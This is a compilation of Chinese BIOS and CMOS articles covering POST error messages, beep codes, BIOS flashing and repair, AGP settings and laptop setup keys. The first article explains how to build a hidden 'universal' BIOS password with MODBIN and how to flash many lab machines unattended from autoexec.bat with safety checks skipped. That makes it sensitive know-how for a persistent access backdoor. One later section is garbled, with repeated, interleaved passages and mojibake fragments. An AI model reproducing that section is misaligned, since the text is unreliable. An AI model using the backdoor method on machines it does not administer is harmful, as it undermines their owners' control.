    您如果做过网管，可能会有这样的经历：某些用户由于恶作剧或误操作设置了开机密码，从而导致了他人无法使用该电脑。一般情况下的解决办法是：尝试几组通用密码，比如“AMI”、“Award”、“Syxz”等，如果连这些通用密码都无效，那就只能打开机箱，取出主板电池给CMOS芯片放电了。于是我就考虑能不能自己DIY一个自己的BIOS万能密码。不论使用者再如何破解修改您的开机密码，您都可以利用自己的万能密码进入系统。经过一番摸索，终于找到了一种最为有效的解决方案，在此与大家共享。

    下面以使用最广泛Award BIOS为例，介绍该方法。

    1、使用 BIOS刷新软件AWDFLASH，将主板原有的BIOS程序备份出来，然后使用MODBIN软件将备份出来的BIOS程序打开。MODBIN程序是Award公司推出的一个BIOS修改工具，它可以设置各种BIOS功能，包括启动提示、BIOS菜单修改等，其中有一项就是我们所需要使用的万能密码设置功能。

    2、启动MODBIN软件后，调入所需编辑的BIOS文件，然后选择菜单“Change BIOS Options”（修改BIOS设置），在右边主窗口，可以找到一行“Security Default Password”（安全默认密码）选项，把默认值“********”改为自己的万能密码即可，最多为8位。最后一定要选择“Update File”，保存到BIOS文件。

    3、如果您是网管，想用于多台电脑的主板BIOS的快速刷新，可制作一张启动盘，然后拷贝AWDFLASH软件，以及经过修改后的BIOS文件xx.bin，在autoexec.bat文件中增加这样一条语句“awdflash.exe xx. bin /sn /py /sb”（/sn:不备份旧的BIOS数据 ；/py:自动完成刷新BIOS的任务；/sb: 刷新BIOS时强行跳过BootBlock模块），多复制几张软盘，然后放在机房的每一台电脑的软驱中，启动即可(当然BIOS中的启动顺序应改为软盘驱动器优先)，电脑会自动进行刷新BIOS的工作。

    上面的修改完成后，将修改过的BIOS文件用AWDFLASH刷入主板。重新启动，从此您就拥有了自己的BIOS万能密码了。至此，不论使用者再如何破解修改您的开机密码，您都可以利用自己的万能密码进入系统，不用再把机箱打开那么麻烦了。

    注：以上方法只适用Award厂家的BIOS，如果你的主板是使用AMI BIOS，BIOS刷新工具改为AMIFLASH，BIOS文件修改工具改为AMIBCP即可。使用方法都大同小异，这里就不再赘述了。


读懂主板BIOS的语言

《一键清理系统垃圾》

读懂主板BIOS的语言

    1. CMOS battery failed（CMOS 电池失效）。
    原因：说明CMOS 电池的电力已经不足，请更换新的电池。
    2. CMOS check sum error－Defaults loaded（CMOS 执行全部检查时发现错误，因此载入预设的系统设定值）。
    原因：通常发生这种状况都是因为电池电力不足所造成，所以不妨先换个电池试试看。如果问题依然存在的话，那就说明 CMOS RAM 可能有问题，最好送回原厂处理。
    3. Display switch is set incorrectly（显示开关配置错误）。
    原因：较旧型的主板上有跳线可设定显示器为单色或彩色，而这个错误提示表示主板上的设定和 BIOS 里的设定不一致，重新设定即可。
    4. Press ESC to skip memory test（内存检查，可按ESC键跳过）。
    原因：如果在 BIOS 内并没有设定快速加电自检的话，那么开机就会执行内存的测试，如果你不想等待，可按 ESC 键跳过或到 BIOS 内开启 Quick Power On Self Test。
    5. HARD DISK initializing 【Please wait a moment...】 （硬盘正在初始化 请等待片刻）。
    原因：这种问题在较新的硬盘上根本看不到。但在较旧的硬盘上，其启动较慢，所以就会出现这个问题。
    6. HARD DISK INSTALL FAILURE （硬盘安装失败）。
    原因：硬盘的电源线、数据线可能未接好或者硬盘跳线不当出错误 ( 例如一根数据线上的两个硬盘都设为 Master 或 Slave。)
    7. Secondary slave hard fail （检测从盘失败）。
    原因：1 CMOS 设置不当（例如没有从盘但在CMOS里设有从盘） 2 硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当。
    8. Hard disk(s) diagnosis fail (执行硬盘诊断时发生错误)。
    原因：这通常代表硬盘本身的故障。你可以先把硬盘接到另一台电脑上试一下，如果问题一样，那只好送修了。
    9. Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)（无法驱动软驱）。
    原因：软驱的排线是否接错或松脱？电源线有没有接好？如果这些都没问题，那买个新的吧。
    10. Keyboard error or no keyboard present (键盘错误或者未接键盘)
    原因：键盘连接线是否插好？连接线是否损坏？
    11. Memory test fail (内存检测失败)
    原因：通常是因为内存不兼容或故障所导致。
    12. Override enable－Defaults loaded ( 当前CMOS设定无法启动系统，载入 BIOS 预设值以启动系统)。
    原因：可能是你在 BIOS 内的设定并不适合你的电脑 ( 像你的内存只能跑100MHz但你让它跑133MHz )，这时进入 BIOS 设定重新调整即可。
    13. Press TAB to show POST screen (按 TAB 键 可以切换屏幕显示)
    原因：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的开机显示画面，而此提示就是要告诉使用者可以按TAB来把厂商的自定义画面和BIOS预设的开机画面进行切换。
    14. Resuming from disk，Press TAB to show POST screen （从硬盘恢复开机，按TAB显示开机自检画面）。
    原因：某些主板的BIOS 提供了 Suspend to disk (挂起到硬盘)的功能，当使用者以 Suspend to disk 的方式来关机时，那么在下次开机时就会显示此提示消息。

    技术网站：www.163164.com 或 www.163164.cn　 QQ 3149886


改进热插拔修复BIOS的方法

《一键清理系统垃圾》

改进热插拔修复BIOS的方法

    BIOS升级失败后的修复方法有很多种，其中就有热插拔法，其方法是：找一块相同的主板，先撬下好的BIOS芯片，再松松地插上，注意不要插得太紧，启动计算机后拔下好的BIOS芯片换上内容已被破坏的BIOS芯片，最后运行升级文件写入正确的BIOS文件即可。具体操作时有些地方要特别注意，否则的话，可能会遇到意想不到的问题。

    首先要注意的是找一块与BIOS损坏的主板相同的主板，这点很重要，这里说的相同指的是同一厂家、同一型号的产品，这样刷BIOS时成功的几率会很大。如果找不到完全相同的主板，要用相同时钟芯片、相同的I/O芯片、相同芯片组的主板，这样做成功的几率会相对大一些。如微星的6199和6163、技嘉的BX2000+和6BX7+主板的BIOS可以相互换用。

    如果只是芯片组相同，其它芯片不同的话，正确刷写的可能性就非常小了。笔者曾遇到过使用不同I/O芯片主板的BIOS芯片来修复另一颗BIOS，完成后不能启动。保存刚刷进BIOS的文件并与源文件比较，发现两者完全不同，刷进去的都是十六进制的“FF”（即为空），重新用不同版本的Award刷写工具刷写，均不成功。每次写入相同的源文件，却出现写入BIOS的内容每次都与源文件不同的情况，令人百思不得其解。最后只好掏钱用编程器写入了事。

    其次，用热插拔的方法刷新BIOS文件时，操作步骤进行如下的改进会让你更容易成功（该方法针对双列直插式封装的BIOS芯片，如果为PLCC封装的BIOS芯片，也可参照本方法进行，但其中的布条形状需做相应的改进）：找到一块好的相同型号（至少芯片组和I/O芯片相同）的主板，撬下BIOS芯片，再剪一条长不少于20cm、宽为1~2cm的布条，从下部兜住BIOS芯片，布条的位置不要影响各引脚，再将BIOS芯片连同布条插入芯片插座（注意方向不要反了），再启动机器。

    当机器正常工作后，一只手扶住主板，另一只手捏住布条两端，稍微用力就可拔出好的芯片。再同样用布条兜住内容被毁的BIOS芯片，按正确的方向插入插座，也要全部插到底，以保证可靠的电接触。然后再运行BIOS刷新程序，直到刷新完毕。最后用同样方法取出刷新好的BIOS芯片，再插上该主板以前的BIOS芯片即告完成。

    用上述方法的好处是一方面能够保证集成电路芯片各脚与插座的可靠电接触，防止因接触不良所导致的刷写失败；另一方面是可以避免用老方法拔出芯片时，芯片易脱手掉在主板上的危险；或是起拔时因用力不均易造成的集成电路引脚弯曲、折断等意外事故的发生。总之，一根小小的布条大大提高了可靠性，如果还要更可靠，那个小布条甚至可以用一块布代替，只是芯片的32个脚要将布扎透后再插上插座……。这个方法笔者已试过多次，非常安全、可靠，推荐大家使用。


各厂牌笔记本电脑进入BIOS方法

《一键清理系统垃圾》

各厂牌笔记本电脑进入BIOS方法

IBM（冷开机按F1，部分新型号可以在重新启动时启动按F1）部分机型的特殊BIOS进入方法不同。

HP（启动和重新启动时按F2）

SONY（启动和重新启动时按F2）

Dell（启动和重新启动时按F2）

Acer（启动和重新启动时按F2）

Toshiba（冷开机时按ESC然后按F1）

Compaq（开机到右上角出现闪动光标时按F10，或者开机时按F10）

Fujitsu（启动和重新启动时按F2）

绝大多数国产和台湾品牌（启动和重新启动时按F2）


更改BIOS设置发挥显卡性能

《一键清理系统垃圾》

更改BIOS设置发挥显卡性能

确定显卡是否发挥出了最佳的性能，主板BIOS中与AGP相关的设置不容忽视，下面做一简单说明。

    AGP Mode（AGP模式）

    AGP模式决定了AGP的频率，其值为66MHz的倍数，1×最慢，8×最快。目前能够真正支持AGP 8×的显卡只有SiS的Xabre。一些主板具有自动侦测功能，可以根据AGP槽中的显卡决定最适合的速率。部分显卡的高级属性中可能有一项“AGP 4× Mode”Enable/Disable设置选项，Enable将设置为4×，Disable将设置为2×。老的Intel BX和VIA Apollo主板由于采用的芯片组不支持AGP 4×，故没有4×选项，对这些主板就选择其最高的值吧。

    AGP Fast Writes（AGP快写）

    决定显存是否允许直接写入，而不通过系统内存中转。该设置设为“Enable”时可以减少图像数据传送到显卡待处理的时间，因为它跳过了系统内存控制器。将该选项设为“Enable”可以提高性能，但是以牺牲系统稳定性为代价的。有些主板没有此选项，但一般来说具有超频功能的主板提供了此选项。

    AGP Sideband Addressing（AGP边带寻址）

    允许边带寻址后，显卡可以处理更多的AGP请求而不降低主要的地址/数据传输速度。具NVIDIA表示，“Enable”这项设定可以提高显卡的性能，但也可能会导致系统不稳定，特别是系统外频超频后。

    AGP Aperture Size（AGP孔径尺寸）

    该项的具体功能是设定AGP卡分享系统内存的大小，其可选取的参数有4MB、8MB、16MB、32MB、64MB、128MB、256MB七种，默认和预设64MB，建议选取默认值即64M。

    点评：以上几项设置有利于显卡性能的发挥，但“AGP边带寻址”一项可能会引起系统不稳定，建议大家尝试使用，如果不存在不稳定现象，再将此设置作为优化的一种方式。


关键时刻还是BIOS自检铃声助我解决疑难

《一键清理系统垃圾》

关键时刻还是BIOS自检铃声助我解决疑难

    一天，打开爱机，突然听到主板BIOS自检时发出一种特殊的声音，随后声音消失。进入登录Windows界面，当我输入登录密码的第一个字母时，只见后面自动出现了一串字符。随即我注销切换到另一没设密码的用户，打开Word文档，当输入一个字符时，文档后面自动不断地出现同一字符。不好，爱机一定染上可恶的病毒了。马上安装KV3000，当输入序列号时，又出现了同样的问题，最后好不容易将杀毒软件安装完毕。杀毒，没发现病毒，重新启动，问题依然。

    那特殊的声音到底是什么意思呢？我百思不得其解，翻出所有的电脑资料，仔细查找，终于找到了问题所在。原来开机时，主板BIOS自检时发出的不同声音，可帮助我们解决电脑存在的问题。以Award BIOS（被大多数主板所采用）为例：长声不断地响表示内存未插好或损坏；1短：系统正常启动；2短：CMOS设置常规错误，需要重新设置不正确的选项；1长1短：内存或主板出错；1长2短：显示器或显示卡错误；1长3短：键盘控制器错误；1长9短：主板BIOS的Flash RAM或Eprom错误。了解上述情况后，重新开机，仔细分辨特殊声音，1长3短，哦，原来是键盘有问题！换一个新键盘，装上，重新启动，问题消失。


经典故障：BIOS、CMOS常见疑难集锦(二)

《一键清理系统垃圾》

经典故障：BIOS、CMOS常见疑难集锦(二)

    9．Memory test fail

    分析：内存测试失败。

    答疑：因为内存不兼容或故障所导致，所以请先以每次开机一条内存的方式分批测试，找出故障的内存，降低内存使用参数工作或者送修。

    为什么要升级BIOS？如何更新BIOS？

    分析：BIOS程序决定了系统对硬件的支持、协调能力。随着新硬件层出不穷，BIOS不可能预先具备对如此繁多的硬件的支持，这就依赖于对BIOS芯片内程序的更新。为了支持到更新的硬件产品，消除以往BIOS的BUG，提高产品之间的兼容性，或者为了提升产品的性能，升级BIOS是最简单有效而又节省的办法。

    答疑：大部分主板厂商都会定期更新产品的BIOS FIREWARM，另外BIOS生产厂商也会提供专用的刷新程序，在不加载任何硬件驱动和内存驻留的纯DOS模式下，运行刷新程序，输入厂商提供的BIOS FIREWARM文件名，通过提示依次选择是否刷新→是否保存原BIOS→是否更新最新的BIOS，最后按F1键重新启动，即可大功告成。

    提示：在这里我们应该尽量将原BIOS名字简化，但是不要更改其扩展名；应该保存原BIOS，以备BIOS刷新失败时使用；整个BIOS刷新过程中不能断电。

    能否在Windows下升级BIOS？

    分析：常规的BIOS刷新程序必须在纯DOS模式下运行，并且，运行时要求系统不能加载其它的内存驻留程序。由于现在Windows 2000和Windows XP已取消对MS-DOS的支持，在这种情况下，采取传统的升级方式将极为不便。

    答疑：很多主板厂商都开发了针对性的刷新程序，整个操作在Windows下进行，可以直接下载更新，也可以在线更新，（由于网络状况不是非常理想，龙哥建议在下载BIOS文件之后进行更新。）更新结束后程序会弹出消息框，提示升级成功，并要求重启计算机。

    升级BIOS要注意哪些问题？

    分析：升级BIOS并不繁杂，只要认真去做，应该是不会出现问题的。

    答疑：但升级过程中一定要注意以下几点：

    1.进入纯DOS模式，不要加载任何硬件产品的驱动，也不要运行任何程序。

    2.使用和主板相符的BIOS升级文件，尽可能用原厂提供的BIOS升级文件。

    3.BIOS刷新程序和BIOS FIREWARM要匹配。一般情况下原厂的BIOS程序升级文件和刷新程序是配套的，所以最好一起下载。

    4.通常很多杂志或朋友都建议在软盘上升级，可是由于软盘的可靠性不如硬盘，很可能造成升级失败，因此，龙哥建议最好在硬盘上升级BIOS。

    5.升级时一定要备份原BIOS，如果升级不成功，那还有恢复的希望。

    6.部分主板提供商在BIOS程序中内置了BIOS更新程序，所以在升级BIOS前，应该在BIOS里把“System BIOS Cacheable”的选项设为Disabled。

    7.某些主板出于保护BIOS的原因，设置了硬跳线禁止BIOS写入，或者在BIOS中设置的“BIOS UPDATA”的选项设为DISABLED，所以在更新之前尽量检查这两项设置，不然会出现更新失败。

    8.写入过程中不允许停电或半途退出，所以如果有条件的话，尽可能使用UPS电源，以防不测。

    在升级BIOS过程中遇到的一些问题

    1．升级Award BIOS时出现提示“Insufficient memory”

    分析：主要原因是常规内存不足,导致更新无法进行。

    答疑：释放一些常规内存即可。只要屏蔽掉系统BIOS缓存和显卡BIOS缓存以及各个设置中的Shadow即可。另外在纯DOS模式下不要加载Drvspace.bin这个文件，否则驻入常规内存从而造成内存不足。如果你采取了以上措施依然出现这个问题，那么试试AWDFlash.exe的/Tiny参数，不过这个参数只在7.0以上版本才提供。注意：重新启动时，在出现“Windows Starting”后按Ctrl+F5，这样可以不加载Drvspace.bin，节省了大约108K 的常规内存空间。

    2．“The Program File’s part number does not match With your System”

    分析：程序代码不适合你的系统，或者说BIOS数据文件不符。

    答疑：不过只要加上/Py参数，更新程序将不检测BIOS版本是否兼容，但是这样操作的危险性较大。龙哥再次建议请尽量使用原厂提供的BIOS数据文件和刷新程序。

    3．“Unknown Type Flash”

    分析：未知类型的FlashROM。

    答疑：这种情况一般发生在需要12V电压才能进行BIOS刷新的Flash ROM情况下（一般的BIOS芯片的工作电压是5V），或者你的主板使用的是不可用软件刷新的EPROM。这种情况有的主板提供跳线（EPROM就免了），在擦写的时候将电压调整为12V方可进行。如果出现上述这些情况，那可能你的Flash ROM芯片已经损坏。

    4．“Program Chip Failed”

    分析：程序芯片失效。

    答疑：这种情况一般出现在型号为28Foo1的Intel Flash ROM芯片上。原因是此芯片中有个8KB Boot Block处于硬件保护状态下，所以Boot Block的内容是无法更新的。这种芯片一般也是需要更高的写入电压或者专用设备才能更新的。


经典故障：BIOS、CMOS常见疑难集锦(一)

《一键清理系统垃圾》

经典故障：BIOS、CMOS常见疑难集锦(一)

    提到BIOS，大部分的菜鸟对此都一知半解，不敢轻易尝试，仿佛天生对“蓝色屏幕”有种恐惧的感觉，而更多的时候，连许多老鸟都无法区分BIOS设置和CMOS设置的区别，所以在写出疑难问答之前，龙哥觉得有必要将这两个概念阐述清楚，以达到事半功倍的效果。

    BIOS是英文Basic Input/Output System的缩写，原意是“基本输入/输出系统”。而我们通常所说的BIOS，其实是指一个固化在ROM中的软件，负责最低级的、最直接的硬件控制，以及计算机的原始操作；用来管理机器的启动和系统中重要硬件的控制和驱动，并为高层软件提供基层调用。

    CMOS是英文“互补金属氧化物半导化”的缩写，不过我们常说的CMOS却是指主板上一块可读写的存储芯片，也称之为“CMOS RAM”。CMOS RAM是随机存储器，具有断电后消除记忆的特点，人们就想到了使用外接电池保持其存储内容的方法。

    一般来说，通过固化在ROM BIOS的软件进行BIOS参数的调整过程就称之为BIOS设置，而通过BIOS设置中的“标准CMOS设置”调试CMOS参数的过程就称为CMOS设置。我们平常所说的CMOS设置与BIOS设置只是其简化说法，所以在一定程度上造成两个概念的混淆。

    怎样进入BIOS设置程序

    分析：虽然世界上设计生产BIOS的厂商并不多，但是某些品牌机和兼容机设计不尽相同，所以进入BIOS设置的方法也各不相同。

    答疑：大部分进入BIOS设置的键都已经设置为“DEL”或者“ESC”，但是也有部分BIOS是F10或者F2，其中一些更特别的BIOS还需要根据其提示进行操作。

    机器无法正常运行操作系统的问题

    1．Bios Rom checksum error－System halted

    分析：BIOS信息检查时发现错误，无法开机。

    答疑：遇到这种情况比较棘手，因为这样通常是刷新BIOS错误造成的，也有可能是BIOS芯片损坏，不管如何，BIOS都需要被修理。

    2．CMOS battery failed

    分析：没有CMOS电池。

    答疑：一般来说都是CMOS没有电了，更换主板上的锂电池即可。

    3．CMOS checksum error－Defaults loaded

    分析：CMOS信息检查时发现错误，因此恢复到出场默认状态。

    答疑：这种情况发生的可能性较多，但是大部分原因都是因为电力供应造成的，比如超频失败后CMOS放电也可以出现这种情况，应该立刻保存CMOS设置以观后效；如果再次出现这个问题，建议更换锂电池。在更换电池仍能无用的情况下，请将主板送修，因为CMOS芯片可以已经损坏。

    4．Press F1 to Continue，Del to setup

    分析：按F1键继续，或者DEL键进入BIOS设置程序。通常出现这种情况的可能性非常多，但是大部分都是告诉用户：BIOS设置发现问题。

    答疑：因为问题的来源不确定，有可能是BIOS的设置失误，也可能是检测到没有安装CPU风扇，用户可以根据这段话上面的提示进行实际操作。

    5．HARD DISK INSTALL FAILURE

    分析：硬盘安装失败。

    答疑：检测任何与硬盘有关的硬件设置，包括电源线、数据线等等，还包括硬盘的跳线设置。如果是新购买的大容量硬盘，也要搞清楚主板是否支持。如果上述都没有问题，那很可能是硬件出现问题，IDE口或者硬盘损坏，但是这种几率极少。
    6．Primary master hard disk fail

    分析：Primary master ide硬盘有错误。同样的情况还出现在IDE口的其他主从盘上，就不一一介绍了。

    答疑：检测任何与硬盘有关的硬件设置，包括电源线、数据线等等，还包括硬盘的跳线设置。

    7．Floppy disks fail

    分析：软驱检测失败。

    答疑：检查任何与软驱有关的硬件设置，包括软驱线、电源线等等，如果这些都没问题，那可能就是软驱故障了。

    8．Keyboard error or no keyboard present

    分析：键盘错误或者找不到新键盘。

    答疑：检查键盘连线是否正确，重新插拔键盘以确定键盘好坏。


开机BIOS语言一点通

《一键清理系统垃圾》

开机BIOS语言一点通

开机自检时出现问题后会出现各种各样的英文短句，短句中包含了非常重要的信息，读懂
这些信息可以自己解决一些小问题，可是这些英文难倒了一部分朋友，下面是一些常见的
BIOS短句的解释，大家可以参考一下。
1.CMOS battery failed
中文：CMOS电池失效。
解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。
2.CMOS check sum error－Defaults loaded
中文：CMOS 执行全部检查时发现错误，要载入系统预设值。
解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没
有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一
年就让经销商送回生产厂家修一下吧！
3.Press ESC to skip memory test
中文：正在进行内存检查，可按ESC键跳过。
解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机解释，大家可以参考一下。
1.CMOS battery failed
中文：CMOS电池失效。
解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。
2.CMOS check sum error－Defaults loaded
中文：CMOS 执行全部检查时发现错误，要载入系统预设值。
解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没
有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一
年就让经销商送回生产厂家修一下吧！
3.Press ESC to skip memory test
中文：正在进行内存检查，可按ESC键跳过。
解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次
内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进
入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enable
d，储存后重新启动即可。
4.Keyboard error or no keyboard present
中文：键盘错误或者未接键盘。
解释：检查一下键盘的连线是否松动或者损坏。
5.Hard disk install failure
中文：硬盘安装失败。
解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一
下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如
果一样，只要将两个硬盘的跳线设置的不一样BE突嶂葱兴拇?
内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进
入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enable
d，储存后重新启动即可。
4.Keyboard error or no keyboard present
中文：键盘错误或者未接键盘。
解释：检查一下键盘的连线是否松动或者损坏。
5.Hard disk install failure
中文：硬盘安装失败。
解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一
下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如
果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）
。
6.Secondary slave hard fail
中文：检测从盘失败
解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误
，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘
的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。
7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)
中文：无法驱动软盘驱动器。
解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是
把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了＜纯桑ㄒ桓錾栉?aster，另一个设为Slave）
。
6.Secondary slave hard fail
中文：检测从盘失败
解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误
，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘
的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。
7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)
中文：无法驱动软盘驱动器。
解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是
把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不
贵。
8.Hard disk(s) diagnosis fail
中文：执行硬盘诊断时发生错误。
解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试
一试，如果问题还是没有解决，只能去修一下了。
9.Memory test fail
中文：内存检测失败。
解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼
容,去换一条吧！
10.Override enable－Defaults loaded
中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。
解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入
系统原来的设定值然后重新%C?迷谌砬?共?
贵。
8.Hard disk(s) diagnosis fail
中文：执行硬盘诊断时发生错误。
解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试
一试，如果问题还是没有解决，只能去修一下了。
9.Memory test fail
中文：内存检测失败。
解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼
容,去换一条吧！
10.Override enable－Defaults loaded
中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。
解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入
系统原来的设定值然后重新启动即可。
11.Press TAB to show POST screen
中文：按TAB键可以切换屏幕显示。
解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按
TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。
12.Resuming from disk，Press TAB to show POST screen
中文：从硬盘恢复开机，按TAB显示开机自检画面）。
解释：这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能，如果我们用
Suspend to disk的方式来关机，那么我们在下次开机时就会显示此提示消息。
13.Hareware Monitor found an error，enter POWER MANAGEMENT SETUP for details，
Press F1 to continue，DEL to enter SETUP
中文：监视功能发现错误，进入POWER MANAGEMENT SETUP察看详细资料，按F1键继续开机
程序，按DEL键进入COMS设置。
解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压
输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么

便会出现上述这段话，这时可以进入COMS设置选择POWER MANAGEMENT SETUP，在右面的**
Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常，
然后再加以解决。


另类的BIOS与内存冲突故障

《一键清理系统垃圾》

另类的BIOS与内存冲突故障

    近日遇到一故障，险些使我把跟我数载的爱机丢弃，去另结新欢。为使其他读者遇到和我一样的情况是别冤枉自己的爱机，也为大家钱包着想，小弟也斗胆写一下自己的故障处理情况，请大侠指教。

    先介绍一下故障主角之一我的电脑主板－大众PA－2007（ 是VP2芯片的那种，南桥是586b) 。为了能用大硬盘和大内存本人将BIOS升级为最新。去年小弟买了64M PC100内存（花了400￥，现在128M也不过400￥好痛苦呀：）！用了一年毫无问题。前几天，主板电池电力不足，开机显示CMOS设置丢失，提取默认设置后机器照用不误。（请大家注意这一点）反复出现这种情况， 几天后我买了一块电池 。恶梦开始了，取下旧电池，测量只有2.5v 。换新电池，开机“嘟，嘟”黑屏，听声音内存报警。我一头雾水，我换电池没碰内存一下 ，为何内存会报警。先不管他，检查内存插槽没问题后，我去朋友家借了一条64M 内存回家满以为爱机马上会好，结果“涛声已旧”。我用替代法检查问题集中到主板上,天那!!主板坏掉,买新的不如升级算了.可怜口袋又该空了.一天我看着爱机 正要拆散,卖几文钱 .发现了以前升级留的16MEDO内存，灵机一动，不知插上行不行。一试竟机器好了。大喜，进CMOS设置存盘。一切正常，静心想想，主板没事，内存没事，那为何64M内存不行呢。又插上64M 内存我惊喜发现一切正常。内存又能用了。

    在这次故障中，我只动过主板电池，莫非问题在此！！！！马上试验，果然我发现拿下电池后，再装上，主板就只认EDO16M而不认64M SDRAM。当用16MEDO启动机器CMOS存盘后，又认64M SDRAM，并且不用再插EDO16M了。若用16MEDO启动机器CMOS不存盘，不用插EDO16M ，就内存报警。回想BIOS升过级，该故障又和CMOS存盘有关。我认为当拿下电池后，再装上时,因为CMOS提取默认设置，这时主板不认64M SDRAM。当进入CMOS存盘后，因为这时CMOS数据改变所以主板又恢复正常认出64M SDRAM。

    这种故障很少见，我个人认为是电脑主板－大众PA－2007（ 是VP2芯片的那种，南桥是586b) BIOS升级后的特殊情况，也许是个bug。 大众PA－2007可配k6－2，相信有不少玩家还在用，而且已经买了几年，主板电池快没电了。希望此文对大家有所帮助。


另类维修BIOS

《一键清理系统垃圾》

另类维修BIOS

    有天，朋友来电话，告诉他单位的小局域网因为频繁停电损坏了三块主板，向我求救。于是我马上出动，到达现场后，采用替换法检查，发现主板的BIOS出现了问题无法正常开机。用热插拔法修复无效，断定是BIOS 芯片物理损坏。

    朋友使用的主板是品牌机整合主板，CPU是P120（够老的），主板BIOS 芯片为Intel的P28F002BX芯片，是2Mbit的芯片。用编程器测试，发现三片芯片均有不同程度的损坏，已不能使用。由于这种芯片现在早已找不到了，因此只能采用手头上现有的Winbond的29C020代用。用编程器把好芯片的数据读出，然后分别写到三片AT29C020中。没想到，当把写好的芯片插到主板上后，通电开机却没有反应，修复没有成功。

    28F002BX是Intel推出的第一代可擦除BIOS芯片，它的内部数据结构是分块的（如图所示）。其中的BOOT BLOCK块是存储BIOS基本启动信息的，它支持ISA形式的显卡，当BIOS升级失败后，可以从BOOT BLOCK启动并修复BIOS，这种设计思路被BIOS刷新程序采用并一直延续到今。在擦除时，28F001是以Byte为最小修改单位的；在写入数据时，芯片上要加上一定的编程电压，并且BOOT BLOCK块内数据的擦除要加上特定的删除电压。

    29C020是Flash ROM（快闪ROM），属于单电压芯片。Flash ROM和EEPROM芯片最大的区别是，在删除数据时，不需加特定的编程电压。另外，Flash ROM在删除资料时，并非以Byte为基本单位，而是以Sector（又称Block）为最小单位。Sector的大小随厂商的不同而有所不同，只有在写入时，才以Byte为最小单位写入。

    以往主板上用的还有27系列的芯片。27系列的芯片属于EPROM，其内的资料是用EPROM擦除器（EPROM Eraser）发出的紫外线照射来擦除的，并且要用专用的编程器才可以把资料重新再写入，往芯片中写内容时也必须要加一定的编程电压。

    在主板上，BIOS芯片平时只处于读数据的状态，从原理上分析，27、28、29系列的芯片是可以代用的，如果不考虑升级的因素，三者是兼容的。因此我怀疑，问题可能是属于主板太老，不支持按页刷新的芯片，亦即老主板与新型芯片“门不当，户不对”。找来一片28F020（也是老古董啦，现在市面上基本已找不到了），在编程器上刷入程序，插到主板上，开机恢复正常，证实了自己的猜测。为了进一步证实上述分析的正确性，用一片27C020写入程序，插入主板上BIOS插座后，通电开机，机器也能正常工作，由此说明此主板的确不支持新式的芯片。

    尽管从理论上讲，27、28、29系列的芯片是可以代用的。但实际应用中要注意，有些主板可能由于设计方面的原因，对有些类型的芯片可能不能很好地支持，若遇到这种情况，可以找不同类型的芯片多试几次。


让MODBIN打造个性化BIOS

《一键清理系统垃圾》

让MODBIN打造个性化BIOS

编者按:在第42期C6版《轻松玩转CBROM》一文中，我们向大家详细介绍了CBROM这个修复主板BIOS文件的强力工具，它能帮助你向BIOS中添加某些功能，或者修改开机LOGO、EPA图案等。今天，我们向大家推荐CBROM的“黄金搭档”──MODBIN。
    可能有些朋友觉得自己的开机画面太普通了，毫无个性化的色彩。别急，有了MODBIN，一切都不是问题。
    MODBIN简介
